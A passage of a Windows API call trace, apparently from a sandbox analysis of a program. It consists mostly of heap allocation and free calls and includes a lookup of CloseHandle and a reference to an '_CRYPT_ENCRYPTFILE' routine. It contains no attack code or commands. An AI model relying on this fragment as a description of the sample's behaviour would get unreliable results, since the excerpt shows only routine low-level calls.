hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.394] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0086.394] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0086.394] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0086.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0086.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.396] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0086.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0086.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0086.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.396] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0086.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0086.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0086.397] CloseHandle (hObject=0x258) returned 1 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0086.397] FreeLibrary (hLibModule=0x772d0000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.398] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0086.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0086.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0086.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0086.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0086.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0086.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0086.400] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0086.400] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0086.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0086.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0086.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0086.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0086.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0086.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0086.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0086.402] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0086.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0086.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0086.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0086.404] 